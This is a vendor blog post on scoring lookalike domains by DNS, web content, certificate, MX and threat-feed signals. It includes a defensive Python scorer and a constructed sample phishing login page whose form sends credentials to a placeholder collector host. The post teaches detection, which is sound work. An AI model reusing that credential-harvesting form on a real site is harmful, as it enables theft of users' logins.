Product · April 1, 2026 · 5 min read

Not Every Lookalike Domain Is a Threat. Here Is How to Tell the Difference.

A registered lookalike domain is not the same as an active phishing site. Understanding the signals that separate real threats from noise is critical to an effective response.

Domain monitoring tools generate a lot of alerts. A scan against a single brand name can surface hundreds of registered lookalike domains, from obvious typos to TLD variants to homoglyph-based impersonations.

The immediate question for any security team is: which of these actually require attention?

A registered domain that does not resolve, has no website, no email capability, and no SSL certificate is probably not an active threat. A registered domain with a cloned login page, a valid certificate from Let's Encrypt, and MX records configured for email delivery is a different situation entirely.

This is what risk scoring is designed to solve.

The Signals We Evaluate

DNS Resolution

The most basic signal. Does the domain resolve to an IP address? A domain that does not resolve is registered but inactive. It may have been registered speculatively, defensively, or as part of a future campaign. It deserves monitoring, but not an emergency response.

Live HTTP Content

Is a web server responding to requests? This distinguishes a parked domain from one where someone has deployed content. The presence of live HTTP content does not confirm malicious intent on its own, but it significantly increases the likelihood that the domain is being put to active use rather than simply held.

SSL Certificate

A valid SSL certificate means the site displays a padlock icon in the browser. For a phishing site, this is the difference between a page that triggers browser warnings and one that looks completely legitimate to the average user. We also record who issued the certificate. Certificates from Let's Encrypt are issued automatically with no identity verification, making them the CA of choice for phishing operations.

MX Records

MX records indicate that the domain can receive email. This is a significant escalation signal. A lookalike domain with MX records can be used for email-based phishing, invoice fraud, and business email compromise (BEC). It can also be configured to intercept replies that were intended for your real domain.

Content Analysis

Beyond checking whether a site is live, PhishFence fetches the actual page content and examines it for specific phishing indicators: login forms with password fields, references to your brand name embedded in the HTML, form actions that submit data to external servers, and patterns that match known phishing kits.

This is the difference between "the domain has a website" and "the domain has a website that is actively trying to steal credentials from your customers."

Threat Intelligence

We check every detected domain against public threat intelligence feeds, including URLhaus, Google Safe Browsing, and PhishTank. If a domain has already been reported as malicious by another organization or security researcher, that provides strong independent confirmation.

Confidence Levels

Combining these signals produces a confidence assessment for each alert:

Confirmed phishing means the domain matches your brand, serves a credential harvesting page, and has been independently flagged by threat intelligence sources. This requires immediate takedown action.

Likely phishing means the domain has all the infrastructure for a phishing campaign (live site, SSL, MX, login form) but has not yet been flagged by external feeds. It may be newly deployed or not yet reported. The response should be the same as confirmed phishing: report it immediately.

Suspected impersonation means the domain is live and references your brand, but the content does not contain obvious credential harvesting elements. It may be a competitor, a parody, a fan site, or early-stage phishing infrastructure. Investigation is warranted.

Registered lookalike means the domain matches a permutation pattern and is registered, but shows minimal or no active infrastructure. Monitor it. If the attacker activates it later, the signal changes will trigger a re-evaluation.
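The content-analysis checks and the four confidence levels above can be expressed as a small scorer. The following is an added example written for this post, not PhishFence's own code: it parses a page for a password field, brand references and an off-site form action, then combines those indicators with the DNS, HTTP, certificate, MX and threat-feed signals to produce one of the four levels. The brand "Acme Bank", the domains, the sample HTML and the collector host are all constructed placeholders, and the fallback rules (a live site that never mentions the brand, or a credential page missing certificate or MX) are this example's assumptions, since the post does not spell those cases out.

```python
"""Multi-signal lookalike-domain scoring (added example, not PhishFence code)."""
from dataclasses import dataclass
from html.parser import HTMLParser
from urllib.parse import urlparse


@dataclass
class ContentIndicators:
    """What the fetched page content tells us (all False for a parked/empty site)."""
    has_password_field: bool = False
    mentions_brand: bool = False
    external_form_action: bool = False


class PhishingIndicatorParser(HTMLParser):
    """Scan HTML for login forms, brand references and forms posting off-site."""

    def __init__(self, brand: str, page_host: str):
        super().__init__()
        self.brand = brand.lower()
        self.page_host = page_host.lower()
        self.result = ContentIndicators()

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.result.has_password_field = True
        if tag == "form" and a.get("action"):
            # A form action pointing at another host is a classic credential-exfil pattern.
            host = urlparse(a["action"]).hostname
            if host and host.lower() != self.page_host:
                self.result.external_form_action = True
        # Brand name may sit in attributes (alt/title) rather than visible text.
        if any(v and self.brand in v.lower() for v in a.values()):
            self.result.mentions_brand = True

    def handle_data(self, data):
        if self.brand in data.lower():
            self.result.mentions_brand = True


def analyze_content(html: str, brand: str, page_host: str) -> ContentIndicators:
    parser = PhishingIndicatorParser(brand, page_host)
    parser.feed(html)
    parser.close()
    return parser.result


@dataclass
class DomainSignals:
    domain: str
    resolves: bool          # DNS resolution
    http_live: bool         # web server answering
    has_certificate: bool   # valid TLS certificate present
    has_mx: bool            # MX records configured
    content: ContentIndicators
    in_threat_feeds: bool   # flagged by URLhaus / Safe Browsing / PhishTank


def assess(s: DomainSignals) -> str:
    """Map combined signals to the post's four confidence levels."""
    if not (s.resolves and s.http_live):
        return "registered lookalike"          # no active infrastructure: monitor
    credential_page = s.content.has_password_field and s.content.mentions_brand
    if credential_page and s.in_threat_feeds:
        return "confirmed phishing"            # brand + harvesting page + independent flag
    if credential_page and s.has_certificate and s.has_mx:
        return "likely phishing"               # full kit, not yet reported externally
    if s.content.mentions_brand:
        # Live and brand-referencing, but missing harvesting elements or infrastructure
        # (assumption: a credential page lacking cert/MX also lands here for investigation).
        return "suspected impersonation"
    return "registered lookalike"              # assumption: live but unrelated to the brand


# Constructed sample: a cloned login page that posts credentials to a third-party host.
BRAND = "Acme Bank"
SAMPLE_LOGIN_PAGE = """
<html><head><title>Acme Bank - Sign in</title></head>
<body><img src="/logo.png" alt="Acme Bank">
<form method="post" action="https://collector.example.net/submit">
  <input type="text" name="user"><input type="password" name="pass">
  <button>Log in</button></form></body></html>
"""


def demo_cases() -> dict:
    """Score four constructed lookalikes and return {domain: confidence level}."""
    cloned = analyze_content(SAMPLE_LOGIN_PAGE, BRAND, "acme-bank-login.example")
    cases = [
        DomainSignals("acme-bank-login.example", True, True, True, True, cloned, True),
        DomainSignals("acmebank-secure.example", True, True, True, True, cloned, False),
        DomainSignals("acmebank-fans.example", True, True, True, False,
                      ContentIndicators(mentions_brand=True), False),
        DomainSignals("acmebnk.example", False, False, False, False,
                      ContentIndicators(), False),
    ]
    return {c.domain: assess(c) for c in cases}


if __name__ == "__main__":
    for domain, level in demo_cases().items():
        print(f"{domain:28} {level}")
```

The ordering of the rules matters: a domain is checked for the strongest level first, so it only reaches "likely phishing" when it has the whole kit (live site, certificate, MX, brand-referencing login form) and drops to "suspected impersonation" as soon as any of those is missing. Re-running `assess` when any signal changes is what lets a monitored "registered lookalike" escalate later, as the post describes.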

Why This Approach Works

Tools that rely on a single signal (domain similarity, DNS resolution, or string matching) generate too much noise. Security teams drown in alerts, most of which turn out to be harmless registrations or unrelated websites that happen to use a similar name.

Multi-signal scoring reduces that noise by combining independent indicators. A domain has to demonstrate multiple characteristics of a phishing operation before it reaches the top of the priority list. This means fewer false positives, faster response to real threats, and less time wasted investigating domains that pose no risk.

Protect your brand from lookalike domains

PhishFence monitors your domain for typosquats, homoglyphs, and phishing sites — and alerts you before your customers are targeted.
